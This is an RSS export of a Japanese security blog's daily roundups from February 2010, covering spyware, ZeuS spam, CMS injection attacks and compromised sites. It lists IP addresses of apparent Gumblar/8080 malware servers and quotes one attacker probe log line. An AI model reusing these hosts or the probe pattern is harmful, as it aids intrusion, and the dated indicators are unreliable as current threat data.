<a href="http://ja.wikipedia.org/wiki/%E9%87%9D%E4%BE%9B%E9%A4%8A"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />針供養</a><br />
<a href="http://ja.wikipedia.org/wiki/%E3%83%AD%E3%82%AB%E3%83%93%E3%83%AA%E3%83%BC"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />ロカビリー</a>(RAB)の日 (<a href="http://www.youtube.com/watch?v=tpzV_0l5ILI"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_youtube.gif" class="cIcon" alt="" />Elvis Presley Jailhouse Rock 1957</a>)<br />
<a href="http://ja.wikipedia.org/wiki/%E3%83%9B%E3%83%86%E3%83%AB%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B8%E3%83%A3%E3%83%91%E3%83%B3%E7%81%AB%E7%81%BD"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />ホテルニュージャパン火災</a>(1982年)<br />
<br />
----------<br />
<br />
月曜朝なので、何も無いはずっ！<br />
<br />
----------<br />
<strong>txsBBSPY</strong><br />
<a href="http://threatpost.com/en_us/blogs/blackberry-spyware-can-intercept-texts-email-track-users-location-020710"><img src="http://www3.atword.jp/gnome/files/2010/01/ic_threatpost.gif" class="cIcon" alt="" />BlackBerry Spyware Can Intercept Texts, Email, Track User's Location</a><br />
<span class="cRefer">A security researcher demonstrated a spyware program at <a href="http://www.shmoocon.org/">the ShmooCon conference</a> on Sunday that is capable of intercepting and recording text messages, emails, Web traffic and other data sent to and from BlackBerry devices. </span><br />
demo: <a href="http://vimeo.com/9192358"><img src="http://www3.atword.jp/gnome/files/2009/04/ico_vimeo.gif" class="cIcon" alt="" />TXSBBSpy Demo(13min)</a>（ながい・・）<br />
盗む対象に<br />
<span class="cRefer">and disconnected calls and track the device's GPS coordinates in real time</span><br />
と、リアルタイムの位置情報が入っているのが素敵（！？）ですね。<br />
<br />
自動的にインストールされる性質のものではありませんので、過敏になる必要はありませんが、スマートフォンへのアプリケーションの導入は少し慎重になったほうがよさそうです。<br />
<a href="http://www.veracode.com/blog/2010/02/is-your-blackberry-app-spying-on-you/">Is Your BlackBerry App Spying on You?</a><br />
<br />
----------<br />
<strong>Oracle out-of-band patches</strong><br />
<a href="http://www.oracle.com/technology/deploy/security/alerts/alert-cve-2010-0073.html"><img src="http://www3.atword.jp/gnome/files/2009/04/ico_oracle.gif" class="cIcon" alt="" />Oracle Security Alert for CVE-2010-0073</a><br />
work-aroundとおもっていたら既にパッチが出ていました。<br />
<br />
<a href="http://www.us-cert.gov/current/index.html#oracle_releases_security_alert_for"><img src="http://www3.atword.jp/gnome/files/2009/04/ico_uscert.gif" class="cIcon" alt="" />Oracle Releases Security Alert for WebLogic Server Vulnerability</a><br />
<a href="http://www.h-online.com/security/news/item/Unscheduled-patch-from-Oracle-923821.html"><img src="http://www3.atword.jp/gnome/files/2009/08/ic_h-security.gif" class="cIcon" alt="" />Unscheduled patch from Oracle </a><br />
<br />
----------<br />
<strong>APT</strong><br />
<a href="http://journal.mycom.co.jp/news/2010/01/13/015/index.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_mycomjournal.gif" class="cIcon" alt="" />Googleの騒ぎ</a>から<a href="http://en.wikipedia.org/wiki/Advanced_Persistent_Threat"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />この用語</a>を目にすることが多くなりました。<br />
大手企業や政府・公共団体機関で、こうした大規模な（特に基幹インフラを狙ったような）攻撃のレポートに興味のある方は、<a href="http://www.mandiant.com/products/services/m-trends"><img src="http://www3.atword.jp/gnome/files/2010/02/ic_mandiant.gif" class="cIcon" alt="" />M-Trends</a>のレポートを精読してみるのもいいかもしれません。<br />
<br />
<a href="http://isc.sans.org/diary.html?storyid=8182"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_sans.gif" class="cIcon" alt="" />Mandiant Mtrends Report</a><br />
<span class="cRefer">Once again a lazy weekend to catch up on some reading. </span><br />
私は lazyなので遠慮します（笑）<br />
<span class="cRefer">or just more FUD (Fear, Uncertainty, and Doubt) added to the pile?</span><br />
となりませんように<br />
<br />
----------<br />
<strong>読み物：skype and security</strong><br />
<a href="http://www.csoonline.com/article/530813/Skype_Security_Is_the_Popular_VOIP_Service_Safe_for_Business_"><img src="http://www3.atword.jp/gnome/files/2010/01/ic_csoonline.gif" class="cIcon" alt="" />Skype Security: Is the Popular VOIP Service Safe for Business?</a><br />
Q&amp;A形式で、わかりやすいです。<br />
<br />
関連：<br />
<a href="http://journal.mycom.co.jp/news/2010/02/04/020/"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_mycomjournal.gif" class="cIcon" alt="" />iPhone用「Skype」"3G回線通話"にまもなく対応 - iPad用も検討中</a><br />
<br />
----------<br />
<strong>DNS-BH</strong><br />
CMSに何かトラブルのあった様子だった DNS-BHが復旧されています。<br />
よかったよかった<br />
<br />
<a href="http://www.malwaredomains.com/wordpress/?p=830"><img src="http://www3.atword.jp/gnome/files/2009/10/ic_dns_bh.gif" class="cIcon" alt="" />2010-02-05 Update: rogue domains, zeus domains, exploit domains</a><br />
<span class="cRefer">Added rogue domains, zeus domains, exploit domains.<br />
Sources include www.malwareurl.com, www.malwaredomainlist.com, malc0de.com, and others:</span><br />
<br />
私はもう、焼却炉の管理ができそうに無いのでそろそろ消して、DNS-BHさんに任せようかな？と思っています。<br />
※特に De-List が難しい<br />
<a href="http://www.malwaredomains.com/wordpress/?p=833"><img src="http://www3.atword.jp/gnome/files/2009/10/ic_dns_bh.gif" class="cIcon" alt="" />Site delisting: checksix-fr.com</a><br />
<br />
<span>企業で使っていて、役に立っていると考えている方は、寄付も検討してネ。</span><br />
<br />
----------<br />
<strong>IPOとデートサイトの関係？</strong><br />
<a href="http://sunbeltblog.blogspot.com/2010/02/youd-think-company-pursuing-ipo-in-this.html"><img src="http://www3.atword.jp/gnome/files/2009/12/ic_sunbelt.gif" class="cIcon" alt="" />You’d think a company pursuing an IPO in this economy would clean up its act </a><br />
<a href="http://ja.wikipedia.org/wiki/%E6%A0%AA%E5%BC%8F%E5%85%AC%E9%96%8B"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />IPO(公開株式)</a> and <a href="http://en.wikipedia.org/wiki/Adult_Friend_Finder"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />Adult FriendFinder</a><br />
なんというか、マルウェアの手法とあまり変わりませんね・・・<br />
<br />
----------<br />
DELETED<br />
１コ<br />
<br />
申し訳ありません。<br />
<br />
----------<br />
<strong>8080</strong><br />
第一系統<br />
NEW IP (as usually) OVH<br />
<span class="cBurn">91.121.96.181</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:16276"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS16276</a>(OVH Paris) <img src="http://www3.atword.jp/gnome/files/2010/02/flag-france.gif" class="cFlag" alt="" title="フランス" /><br />
NEW IP (as usually) OVH<br />
<span class="cBurn">91.121.112.227</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:16276"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS16276</a>(OVH Paris) <img src="http://www3.atword.jp/gnome/files/2010/02/flag-france.gif" class="cFlag" alt="" title="フランス" /><br />
<br />
<span class="cAttention">78.41.156.236</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:6908"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS6908</a>(DATAHOP) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-unitedkingdom.jpg" class="cFlag" alt="" title="英" /><br />
<span class="cAttention">85.25.152.241</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:8972"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS8972</a>(PLUSSERVER) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-germany.jpg" class="cFlag" alt="" title="ドイツ" /><br />
<span class="cAttention">94.23.199.154</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:16276"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS16276</a>(OVH Paris) <img src="http://www3.atword.jp/gnome/files/2010/02/flag-france.gif" class="cFlag" alt="" title="フランス" /><br />
<br />
第二系統(重複除外)<br />
NEW IP/ISP<br />
<span class="cBurn">89.105.199.130</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:24875"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS24875</a>(NL-ISPSERVICES) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-netherlands.jpg" class="cFlag" alt="" title="オランダ" /><br />
<span class="cAttention">213.251.164.84</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:16276"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS16276</a>(OVH Paris)<img src="http://www3.atword.jp/gnome/files/2010/02/flag-france.gif" class="cFlag" alt="" title="フランス" /><br />
<br />
第三系統(重複除外)<br />
<span class="cAttention">77.68.44.169</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:15418"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS15418</a>(FASTHOSTS) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-unitedkingdom.jpg" class="cFlag" alt="" title="英" /><br />
<span class="cAttention">78.31.107.49</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:24931"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS24931</a>(DEDIPOWER) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-unitedkingdom.jpg" class="cFlag" alt="" title="英" /><br />
<span class="cAttention">188.40.118.68</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:24940"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS24940</a>(HETZNER) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-germany.jpg" class="cFlag" alt="" title="ドイツ" /><br />
<br />
まだまだ弾薬が残ってるなぁ・・<br />
OVHはISPの管理パスでも漏洩してるのでしょうか？（本当にマルウェア管理者の運営だったら恐ろしい）<br />
<br />
----------<br />
<strong>Google Safe Browsing</strong><br />
| 1265572830 | B    | [goog-black-hash 1.50538 update] <br />
| 1265572802 | M    | [goog-malware-hash 1.19204 update]<br />
|   321991 | +7595(314396) 反転増加中<br />
|  1344685 | <br />
EoF</p>
]]></content:encoded>
			<wfw:commentRss>http://www3.atword.jp/gnome/2010/02/08/feb-08-2010mon/feed/</wfw:commentRss>
		<xhtml:link rel="alternate" media="handheld" type="text/html" href="http://www3.atword.jp/gnome/2010/02/08/feb-08-2010mon/" />
	</item>
		<item>
		<title>2010.02.07 日曜日</title>
		<link>http://www3.atword.jp/gnome/2010/02/07/feb-07-2010-sun/</link>
		<comments>http://www3.atword.jp/gnome/2010/02/07/feb-07-2010-sun/#comments</comments>
		<pubDate>Sun, 07 Feb 2010 01:14:34 +0000</pubDate>
		<dc:creator>gnome</dc:creator>
		
		<category><![CDATA[security]]></category>

		<category><![CDATA[CNet]]></category>

		<category><![CDATA[F-Secure]]></category>

		<category><![CDATA[facebook]]></category>

		<category><![CDATA[FFXI]]></category>

		<category><![CDATA[iPad]]></category>

		<category><![CDATA[ITmedia]]></category>

		<category><![CDATA[Joomla!]]></category>

		<category><![CDATA[krebsonsecurity]]></category>

		<category><![CDATA[MacOS]]></category>

		<category><![CDATA[MfA]]></category>

		<category><![CDATA[NIC]]></category>

		<category><![CDATA[NSA]]></category>

		<category><![CDATA[ptlabo]]></category>

		<category><![CDATA[SANS]]></category>

		<category><![CDATA[TechCrunch]]></category>

		<category><![CDATA[tekuteku]]></category>

		<category><![CDATA[TinyMCE]]></category>

		<category><![CDATA[VirusTotal]]></category>

		<category><![CDATA[wordpress]]></category>

		<category><![CDATA[WoW]]></category>

		<category><![CDATA[ZeuS]]></category>

		<guid isPermaLink="false">http://www3.atword.jp/gnome/?p=7424</guid>
		<description><![CDATA[
 
北方領土の日
安政元年12月21日（新暦1855年2月7日）に日露和親条約が結ばれた。
長野の日
1998年、長野冬季オリンピックの開会式が行われた
福井県ふるさとの日
フナの日

----------
訂正
co [...]]]></description>
			<content:encoded><![CDATA[<p>
 <div class="div10refer"></div>
<a href="http://ja.wikipedia.org/wiki/%E5%8C%97%E6%96%B9%E9%A0%98%E5%9C%9F%E3%81%AE%E6%97%A5"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />北方領土の日</a><br />
<div class="div10refer">安政元年12月21日（新暦1855年2月7日）に<a href="http://ja.wikipedia.org/wiki/%E6%97%A5%E9%9C%B2%E5%92%8C%E8%A6%AA%E6%9D%A1%E7%B4%84"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />日露和親条約</a>が結ばれた。</div>
長野の日<br />
<div class="div10refer">1998年、<a href="http://ja.wikipedia.org/wiki/%E9%95%B7%E9%87%8E%E3%82%AA%E3%83%AA%E3%83%B3%E3%83%94%E3%83%83%E3%82%AF"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />長野冬季オリンピック</a>の<a href="http://www.youtube.com/watch?v=Fu77vjUmPsI"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_youtube.gif" class="cIcon" alt="" />開会式</a>が行われた</div>
<a href="http://ja.wikipedia.org/wiki/%E7%A6%8F%E4%BA%95%E7%9C%8C"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />福井県</a>ふるさとの日<br />
<a href="http://ja.wikipedia.org/wiki/%E3%83%95%E3%83%8A"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />フナ</a>の日<br />
<br />
----------<br />
訂正<br />
<a href="http://www3.atword.jp/gnome/2010/02/04/feb-04-2010-th/#comment-1878"><img src="http://www3.atword.jp/gnome/files/2009/05/ico_myu_atword.gif" class="cIcon" alt="" />comment - “2010.02.04 木曜日”</a><br />
<span class="cRefer">ワンタイムパスワードトークンの導入はFFXIよりWoWのほうが先でした。</span><br />
774様ありがとうございます。<br />
トークンはてっきり FFが先だとおもっていました～<br />
<br />
----------<br />
<br />
日曜ですし何もない・・・よね？<br />
<br />
----------<br />
<strong>Wordpress something wrong?</strong><br />
<a href="http://isc.sans.org/diary.html?storyid=8164"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_sans.gif" class="cIcon" alt="" />WordPress iframe injection?</a><br />
<span class="cRefer">the compromise resulted in the injection of some obfuscated javascript that created a hidden iframe.<br />
may be a permission problem or perhaps some sort of SQL injection issue with joomla or the tinymce editor (at least, that is what the log entries showed that someone is looking for).</span><br />
怪しいログ：<br />
<span class="cBurn">GET /joomla/plugins/editors/tinymce/jscripts/tiny_mce/license.txt</span><br />
<br />
Juumla!を使用中の方、もしくは、WordPressでTinyMCEを使っている方は、ログをチェック、システム内に存在する phpファイルを確認してみてください。<br />
※TinyMCEは、予期せずインストールされている場合があります。<br />
<br />
<a href="http://forum.joomla.org/viewtopic.php?f=267&amp;t=310813"><img src="http://www3.atword.jp/gnome/files/2009/12/ic_juumla.gif" class="cIcon" alt="" />TinyMCE FileManager HACK</a><br />
<br />
----------<br />
<strong>.jpはいいけど・・</strong><br />
<a href="http://japan.cnet.com/news/media/story/0,2000056023,20408146,00.htm"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_cnet_black.gif" class="cIcon" alt="" />“.日本”と“.jp”は登録者を一致させるべき--ドメイン管理運用の業界団体が意見書</a><br />
<span class="cRefer">このほど表明した意見書では、“.日本”ドメインの導入にあたって利用者が混乱しないよう“.jp”と登録者を完全に一致させた上で、“.jp”と同程度の<a href="http://www.youtube.com/watch?v=QiO_E_u4VKE"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_youtube.gif" class="cIcon" alt="" />安全性</a>と安定性が図られるべきだと主張している。</span><br />
「？」<br />
よくわからないけど、.jpを取ったら強制的に .日本 も取らされるとか？<br />
<br />
というかUnicodeドメインは、<s>WinXP</s> <span class="cAttention">IE6</span> が駆逐されるまでヤメてほしいんですけどね～<br />
※素で間違えました。申し訳ありません。<br />
ユニコードドメイン（国際化ドメイン）の問題は<br />
<a href="http://japan.cnet.com/news/sec/story/0,2000056024,20080606,00.htm"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_cnet_black.gif" class="cIcon" alt="" />国際化ドメイン名のフィッシング詐欺はブラウザの責任ではないとJPRSが見解</a><br />
このへんかな？<br />
<br />
----------<br />
<strong>読み物：MacOS X の物理メモリ解析</strong><br />
<a href="http://isc.sans.org/diary.html?storyid=8167"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_sans.gif" class="cIcon" alt="" />Memory Analysis - time to move beyond XP</a><br />
<a href="http://blackhat.com/presentations/bh-dc-10/Suiche_Matthieu/Blackhat-DC-2010-Advanced-Mac-OS-X-Physical-Memory-Analysis-slides.pdf"><img src="http://www3.atword.jp/gnome/files/2009/07/ic_blackhat2.gif" class="cIcon" alt="" />Mac OS X Physical Memory Analysis<img src="http://www3.atword.jp/gnome/files/2009/02/ico_pdf.gif" class="cIcon" alt="" /></a><br />
<a href="http://blackhat.com/presentations/bh-dc-10/Suiche_Matthieu/Blackhat-DC-2010-Advanced-Mac-OS-X-Physical-Memory-Analysis-wp.pdf"><img src="http://www3.atword.jp/gnome/files/2009/07/ic_blackhat2.gif" class="cIcon" alt="" />Mac OS X Physical Memory Analysis(White Paper)<img src="http://www3.atword.jp/gnome/files/2009/02/ico_pdf.gif" class="cIcon" alt="" /></a><br />
ほえ～<br />
MacOSって別次元のものかと思ってましたけど、こうしてバラされると、BSD系Unixも色濃く混じってる(<a href="http://ja.wikipedia.org/wiki/Darwin_%28%E3%82%AA%E3%83%9A%E3%83%AC%E3%83%BC%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%82%B7%E3%82%B9%E3%83%86%E3%83%A0%29"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />Darwin</a>)んだなぁっと感心。<br />
<br />
----------<br />
<strong>ZeuS は .govやら .milをターゲットにしている？</strong><br />
<a href="http://www.krebsonsecurity.com/2010/02/zeus-attack-spoofs-nsa-targets-gov-and-mil/"><img src="http://www3.atword.jp/gnome/files/2010/01/ic_krebsonsecurity.gif" class="cIcon" alt="" />Zeus Attack Spoofs NSA, Targets .gov and .mil</a><br />
誤訳すると激しく恐ろしいセクションなので慎重に読んでみてください（笑）<br />
<span class="cRefer">Criminals are spamming the Zeus banking Trojan in a convincing e-mail that spoofs the National Security Agency. Initial reports indicate that a large number of government systems may have been compromised by the attack.</span><br />
<a href="http://ja.wikipedia.org/wiki/%E3%82%A2%E3%83%A1%E3%83%AA%E3%82%AB%E5%9B%BD%E5%AE%B6%E5%AE%89%E5%85%A8%E4%BF%9D%E9%9A%9C%E5%B1%80"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />NSA</a>の諮問機関のひとつ <a href="http://ja.wikipedia.org/wiki/%E5%9B%BD%E5%AE%B6%E6%83%85%E5%A0%B1%E4%BC%9A%E8%AD%B0"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />NIC</a>から、「ZeuSのようなもの」が送信されており、米政府内、もしくは軍へのスピア型攻撃に使用されているのではないか？　という話・・<br />
<a href="http://www.virustotal.com/analisis/3c1d8359112caf87b33a4d6fedef2f2dbdf03d5d7c0d7f00883afcb6a7e2f610-1265331501"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_virustotal.gif" class="cIcon" alt="" />2020.zip.txt</a> <span class="cDanger">16</span>/39 (41.03%)<br />
<br />
----------<br />
<strong>瓦はどこへ？</strong><br />
<a href="http://japan.cnet.com/special/story/0,2000056049,20407932,00.htm"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_cnet_black.gif" class="cIcon" alt="" />「iPad」関連のうわさを答え合わせ--予想の的中率は？</a><br />
個人的に iSlate は結構よかったんですが、やっぱり一般的な用語ではなかったようで・・<br />
そういえば<a href="http://www.itmedia.co.jp/news/articles/1001/28/news088.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_itmedia.gif" class="cIcon" alt="" />富士通の件</a>はどうするんでしょうね？<br />
<br />
----------<br />
<strong>Facebook</strong><br />
<a href="http://www.f-secure.com/weblog/archives/00001875.html"><img src="http://www3.atword.jp/gnome/files/2009/09/ic_f-secure2.gif" class="cIcon" alt="" />New Facebook Home Page, Important New Privacy Setting</a><br />
<br />
<a href="http://jp.techcrunch.com/archives/20100205facebooks-project-titan-a-full-featured-webmail-product/"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_techcrunch.gif" class="cIcon" alt="" />Facebook やっと本格的なWebメールをサポート–Gmailキラーと騒ぐ人たちも</a><br />
<span class="cRefer">Facebook Connectと個人名URLをベースとして、本格的なWebメール製品を使える…これにはGoogleも震え上がるかもしれない。ほんとにGmailキラーか？　そうは思わないが、強力な製品であることは確かだ。</span><br />
Gmail(Google Apps)とはちょっと違うような・・<br />
<br />
----------<br />
<strong>フォレンジック製品のページが ガンブラー'ed</strong><br />
個々の陥落サイトを挙げるのは既に止めてますが、スルーカ ＜ 事態なケース<br />
<a href="http://www.oakis.co.jp/topics/news/2010/01/netevidence.php">NetEvidenceサイトの改ざんに関するお詫びとお知らせについて</a><br />
フォレンジック製品のページが陥落ってのもアレですが、どうせなら、導入していた「フォレンジック」を駆使して、改ざんの経緯、経路、インパクトなどを公表して欲しかったですね。<br />
<br />
ttp://www.netevidence.jp/products/<br />
<span class="cAttention">全ての通信データを記録・保存・解析するネットワークフォレンジックサーバ「NetEvidence」</span><br />
<span class="cRefer">「NetEvidence」は企業のネットワーク上で使われるパソコンからの電子メール、Webブラウザを使ってのウェブサイト閲覧、<u>ファイル転送を行なうFTPなど、社外へ流れるすべての通信データを記録・解析・保存するネットワークフォレンジックサーバ製品</u>です。<br />
記録、保存した通信データは、Webブラウザの管理画面から閲覧・解析・調査が可能。技術に詳しくない方でも簡単に管理・調査が行なえます。<br />
御社の貴重な情報の漏えいを抑止するとともに、万一漏えいが発生した場合における漏えい者の特定と証拠保全ができる装置（アプライアンス）です。</span><br />
<br />
医者の不養生？<br />
というか、同様のビジネスを展開していることも含め、フォレンジック・ビジネス全体の信頼低下につながると思うんですが、どうなんでしょ？<br />
<br />
フォレンジックとは、参考：<br />
<a href="http://www.atmarkit.co.jp/fsecurity/special/64forensic/forensic01.html"><img src="http://www3.atword.jp/gnome/files/2009/10/ic_atit.gif" class="cIcon" alt="" />内部不正による情報漏えいを許さない(前編)</a><br />
<a href="http://www.atmarkit.co.jp/fsecurity/special/67forensic/forensic01.html"><img src="http://www3.atword.jp/gnome/files/2009/10/ic_atit.gif" class="cIcon" alt="" />フォレンジックで内部不正を発見せよ(後編)</a><br />
<br />
----------<br />
<strong>チクったろ（笑）</strong><br />
<a href="http://blog.ptlabo.net/index.php?id=10020008"><img src="http://www3.atword.jp/gnome/files/2010/02/ic_tekuteku.gif" class="cIcon" alt="" />Technorati.com の広告が腐ってる -- てくてく糸巻き</a><br />
<span class="cRefer">コンテンツはありません。<br />
（なんでoverture、つまりヤフー（日本）の審査で許可が通るんでしょうね）</span><br />
これはヒドい・・<br />
たぶん米国内に日本語の審査担当が居ないんでしょうネ<br />
<br />
<span class="cCom">うちのメンバーに、学校関係者(ちょっと伝言ゲームになるけど)がいるので、チクっておくように依頼しておこうっと</span><br />
<br />
用語<br />
　MfA : Make for Adsense<br />
　アービトラージ : Arbitrage sites (<a href="http://www.google.com/support/forum/p/AdSense/thread?tid=259effe852a958f2&amp;hl=en"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />Google用語?</a>)<br />
<a href="http://japan.cnet.com/blog/takawata/2006/11/13/entry__mfa/"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_cnet_black.gif" class="cIcon" alt="" />コンテンツ連動広告で稼ぐ人々(1) - MFAサイトとは？ -- 2006.11</a><br />
<br />
----------<br />
<strong>8080</strong><br />
第１<br />
*NEW* IP as <a href="http://www.malwaredomainlist.com/mdl.php?search=8972&amp;colsearch=All&amp;quantity=50"><img src="http://www3.atword.jp/gnome/files/2009/05/ico_mdl.gif" class="cIcon" alt="" />PLUSSERVER</a><br />
<span class="cBurn">85.25.152.241</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:8972"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS8972</a>(PLUSSERVER) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-germany.jpg" class="cFlag" alt="" title="ドイツ" /><br />
<span class="cAttention">78.41.156.236</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:6908"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS6908</a>(DATAHOP) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-unitedkingdom.jpg" class="cFlag" alt="" title="英" /><br />
<span class="cAttention">84.200.227.144</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:31400"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS31400</a>(ACCELERATED) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-germany.jpg" class="cFlag" alt="" title="ドイツ" /><br />
<span class="cAttention">94.23.199.154</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:16276"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS16276</a>(OVH Paris) <img src="http://www3.atword.jp/gnome/files/2010/02/flag-france.gif" class="cFlag" alt="" title="フランス" /><br />
<span class="cAttention">94.199.240.61</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:39023"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS39023</a>(IU-AS) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-germany.jpg" class="cFlag" alt="" title="ドイツ" /><br />
<br />
第２<br />
<span class="cAttention">77.68.44.169</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:15418"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS15418</a>(FASTHOSTS) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-unitedkingdom.jpg" class="cFlag" alt="" title="英" /><br />
<span class="cAttention">78.31.107.49</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:24931"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS24931</a>(DEDIPOWER) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-unitedkingdom.jpg" class="cFlag" alt="" title="英" /><br />
<span class="cAttention">82.165.47.29</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:8560"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS8560</a>(SCHLUND) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-germany.jpg" class="cFlag" alt="" title="ドイツ" /><br />
<span class="cAttention">87.118.90.76</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:31103"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS31103</a>(KEYWEB-AS) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-germany.jpg" class="cFlag" alt="" title="ドイツ" /><br />
<span class="cAttention">217.160.110.21</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:8560"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS8560</a>(ONEANDONE-AS) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-germany.jpg" class="cFlag" alt="" title="ドイツ" /><br />
<br />
第３（重複除外）<br />
<span class="cAttention">188.40.118.68</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:24940"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS24940</a>(HETZNER) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-germany.jpg" class="cFlag" alt="" title="ドイツ" /><br />
<span class="cAttention">213.251.164.84</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:16276"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS16276</a>(OVH Paris)<img src="http://www3.atword.jp/gnome/files/2010/02/flag-france.gif" class="cFlag" alt="" title="フランス" /><br />
<br />
第４・・・・<br />
<span class="cAttention">80.69.74.73</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:20857"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS20857</a>(TRANSIP) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-netherlands.jpg" class="cFlag" title="オランダ" /><br />
